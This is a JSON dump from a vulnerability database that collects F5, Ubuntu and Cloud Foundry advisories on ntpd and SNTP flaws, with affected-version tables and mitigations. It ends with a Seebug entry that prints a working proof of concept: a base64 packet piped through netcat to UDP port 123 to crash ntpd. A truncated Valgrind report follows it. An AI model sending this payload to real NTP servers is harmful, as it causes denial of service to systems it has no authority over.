Manager| 3.1.1| None| Medium| ntpd \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| ntpd \nBIG-IQ ADC| 4.5.0| None| Medium| ntpd \nBIG-IQ Centralized Management| 5.0.0 - 5.2.0 \n4.6.0| None| Medium| ntpd \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| ntpd \nF5 iWorkflow| 2.0.0 - 2.2.0| None| Medium| ntpd \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| ntpd\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nAvoid enabling the NTP trap service on the BIG-IP system. 
This option is blocked, by default, on the BIG-IP system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n", "modified": "2017-07-06T08:46:00", "published": "2016-12-31T00:35:00", "href": "https://support.f5.com/csp/article/K55405388", "id": "F5:K55405388", "type": "f5", "title": "NTP vulnerability CVE-2016-9311", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-11-30T01:28:04", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-11-29T00:00:00", "published": "2016-11-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/63/sol63326092.html", 
"id": "SOL63326092", "type": "f5", "title": "SOL63326092 - NTP vulnerability CVE-2016-7434", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-08T00:16:19", "bulletinFamily": "software", "cvelist": ["CVE-2016-9310"], "edition": 1, "description": "\nF5 Product Development has assigned ID 631836 (BIG-IP), ID 633055 (F5 iWorkflow), ID 632399 (BIG-IQ), and ID 632560 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H87922456 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| None| Medium| **ntpd** \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP DNS| 12.0.0 - 12.1.2| None| Medium| **ntpd** \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| None| Medium| **ntpd** \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| **ntpd** \nBIG-IP WebAccelerator| 
11.2.1 \n10.2.1 - 10.2.4 \nNone| None| Medium| **ntpd** \nBIG-IP WebSafe| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| None| Medium| **ntpd** \nARX| None| 6.2.0 - 6.4.0| Not vulnerable1| None \nEnterprise Manager| 3.1.1| None| Medium| **ntpd** \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| **ntpd** \nBIG-IQ ADC| 4.5.0| None| Medium| **ntpd** \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Medium| **ntpd** \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| **ntpd** \nF5 iWorkflow| 2.0.0 - 2.0.2| None| Medium| **ntpd** \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable1| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable1| None \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nThere is no mitigation. 
To avoid vulnerability exposure, F5 recommends that you do not remove the **restrict default noquery** statement from the **ntpd** configuration.\n\n**Impact of recommendation:** Various F5 product features rely on proper date and time configuration; ensure that any modifications to the **ntpd** configuration are compatible with your environment.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K14120: Defining advanced NTP configurations on the BIG-IP system (11.x - 12.x)](<https://support.f5.com/csp/article/K14120>)\n * [Internet Engineering Task Force (RFC 2827) - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](<https://tools.ietf.org/html/rfc2827>)\n\n**Note**: This link takes you to a resource outside of AskF5. 
The third party could remove the document without our knowledge.\n", "modified": "2017-04-06T00:44:00", "published": "2016-12-22T04:26:00", "href": "https://support.f5.com/csp/article/K87922456", "id": "F5:K87922456", "type": "f5", "title": "NTP vulnerability CVE-2016-9310", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-06-28T14:42:25", "bulletinFamily": "software", "cvelist": ["CVE-2015-5219"], "description": "\nF5 Product Development has assigned ID 568151 (BIG-IP) and ID 568164 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP AAM| None| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP Analytics| 11.0.0 - 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP APM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP ASM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP DNS| None| 13.0.0 \n12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nBIG-IP GTM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 11.4.0 - 11.6.0| Low| SNTP \nBIG-IP Link Controller| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP PEM| 11.3.0*| 13.0.0 \n12.0.0 \n11.4.0 - 11.6.0| Low| SNTP \nBIG-IP PSM| 11.0.0 - 11.3.0* \n10.1.0 
- 10.2.4*| 11.4.0 - 11.4.1| Low| SNTP \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nBIG-IP WOM| 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4*| None| Low| SNTP \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1 HF5*| 3.1.1 HF6| Low| SNTP \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n* The SNTP binary is included in BIG-IP 10.1.0 through 11.3.0, and Enterprise Manager 3.x; however, SNTP binary is not used by the BIG-IP and Enterprise Manager systems by default. In BIG-IP 11.4.0 and later, the SNTP binary is removed.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can avoid launching the SNTP process manually.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9856: The BIG-IP system does not support time synchronization using SNTP](<https://support.f5.com/csp/article/K9856>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "edition": 1, "modified": "2018-02-06T01:02:00", "published": "2016-01-20T01:20:00", "id": "F5:K60352002", "href": "https://support.f5.com/csp/article/K60352002", "title": "SNTP vulnerability CVE-2015-5219", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T17:23:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-5219"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can avoid launching the SNTP process manually.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL9856: The BIG-IP system does not support time synchronization using SNTP\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-15T00:00:00", "published": "2016-01-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/60/sol60352002.html", "id": "SOL60352002", "title": "SOL60352002 - SNTP vulnerability CVE-2015-5219", "type": "f5", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "Yihan Lian discovered that NTP incorrectly handled certain large request \ndata values. A remote attacker could possibly use this issue to cause NTP \nto crash, resulting in a denial of service. This issue only affected \nUbuntu 16.04 LTS. (CVE-2016-2519)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. This issue only affected \nUbuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. 
(CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. This issue only affected Ubuntu 14.04 LTS, \nUbuntu 16.04 LTS, and Ubuntu 16.10. (CVE-2016-7427, CVE-2016-7428)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to perform a denial of \nservice. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and \nUbuntu 16.10. (CVE-2016-7429)\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly \nhandled origin timestamps of zero. A remote attacker could possibly use \nthis issue to bypass the origin timestamp protection mechanism. This issue \nonly affected Ubuntu 16.10. (CVE-2016-7431)\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP \nincorrectly performed initial sync calculations. This issue only applied \nto Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7433)\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist \nqueries. A remote attacker could possibly use this issue to cause NTP to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n16.04 LTS and Ubuntu 16.10. (CVE-2016-7434)\n\nMatthew Van Gundy discovered that NTP incorrectly handled origin timestamp \nchecks. A remote attacker could possibly use this issue to perform a denial \nof service. This issue only affected Ubuntu 16.10 and Ubuntu 17.04. \n(CVE-2016-9042)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \nThis issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu \n16.10. (CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. 
\nA remote attacker could possibly use this issue to cause NTP to crash, \nresulting in a denial of service. This issue only applied to Ubuntu 14.04 \nLTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)\n\nIt was discovered that NTP incorrectly handled memory when processing long \nvariables. A remote authenticated user could possibly use this issue to \ncause NTP to crash, resulting in a denial of service. (CVE-2017-6458)\n\nIt was discovered that NTP incorrectly handled memory when processing long \nvariables. A remote authenticated user could possibly use this issue to \ncause NTP to crash, resulting in a denial of service. This issue only \napplied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly \nhandled the /dev/datum device. A local attacker could possibly use this \nissue to cause a denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings \nin a :config directive. A remote authenticated user could possibly use \nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6463)\n\nIt was discovered that NTP incorrectly handled certain invalid mode \nconfiguration directives. A remote authenticated user could possibly use \nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6464)", "edition": 5, "modified": "2017-07-05T00:00:00", "published": "2017-07-05T00:00:00", "id": "USN-3349-1", "href": "https://ubuntu.com/security/notices/USN-3349-1", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-7427", "CVE-2017-6462", "CVE-2017-6463", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426"], "description": "USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. 
This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. (CVE-2016-7427, CVE-2016-7428)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \n(CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash, resulting \nin a denial of service. (CVE-2016-9311)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled \nthe /dev/datum device. A local attacker could possibly use this issue to cause \na denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a \n:config directive. A remote authenticated user could possibly use this issue \nto cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. 
(CVE-2018-7185)", "edition": 4, "modified": "2019-01-23T00:00:00", "published": "2019-01-23T00:00:00", "id": "USN-3707-2", "href": "https://ubuntu.com/security/notices/USN-3707-2", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:04", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nYihan Lian discovered that NTP incorrectly handled certain large request data values. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. ([CVE-2016-2519](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-2519>))\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7426](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7426>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7427](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7427>), [CVE-2016-7428](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7428>))\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. 
A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7429](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7429>))\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly handled origin timestamps of zero. A remote attacker could possibly use this issue to bypass the origin timestamp protection mechanism. This issue only affected Ubuntu 16.10. ([CVE-2016-7431](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7431>))\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly performed initial sync calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7433](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7433>))\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist queries. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7434](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7434>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 16.10 and Ubuntu 17.04. ([CVE-2016-9042](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9042>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-9310](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9310>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. 
This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-9311](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9311>))\n\nIt was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. ([CVE-2017-6458](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6458>))\n\nIt was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. ([CVE-2017-6460](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6460>))\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. A local attacker could possibly use this issue to cause a denial of service. ([CVE-2017-6462](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6462>))\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. ([CVE-2017-6463](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6463>))\n\nIt was discovered that NTP incorrectly handled certain invalid mode configuration directives. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. 
([CVE-2017-6464](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6464>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.32\n * 3363.x versions prior to 3363.29\n * 3421.x versions prior to 3421.18\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.137.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions prior to 3312.32\n * Upgrade 3363.x versions prior to 3363.29\n * Upgrade 3421.x versions prior to 3421.18\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.137.0 or later.\n\n# References\n\n * [USN-3349-1](<http://www.ubuntu.com/usn/usn-3349-1/>)\n * [CVE-2016-2519](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-2519>)\n * [CVE-2016-7426](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7426>)\n * [CVE-2016-7427](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7427>)\n * [CVE-2016-7428](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7428>)\n * [CVE-2016-7429](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7429>)\n * [CVE-2016-7431](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7431>)\n * [CVE-2016-7433](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7433>)\n * [CVE-2016-7434](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7434>)\n * [CVE-2016-9042](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9042>)\n * [CVE-2016-9310](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9310>)\n * [CVE-2016-9311](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9311>)\n * 
[CVE-2017-6458](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6458>)\n * [CVE-2017-6460](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6460>)\n * [CVE-2017-6462](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6462>)\n * [CVE-2017-6463](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6463>)\n * [CVE-2017-6464](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6464>)\n", "edition": 5, "modified": "2017-08-04T00:00:00", "published": "2017-08-04T00:00:00", "id": "CFOUNDRY:8722C197C1671303FFCA9E919368B734", "href": "https://www.cloudfoundry.org/blog/usn-3349-1/", "title": "USN-3349-1: NTP vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:42", "description": "poc\r\n\r\n```\r\necho \"FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY\"\\ \r\n| \"WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=\" | base64 -d | nc -u -v 127.0.0.1 123 \r\n```\r\n\r\nValgrind report\r\n\r\n```\r\n$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf |\r\n| ==5389== Memcheck, a memory error detector |\r\n| ==5389== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
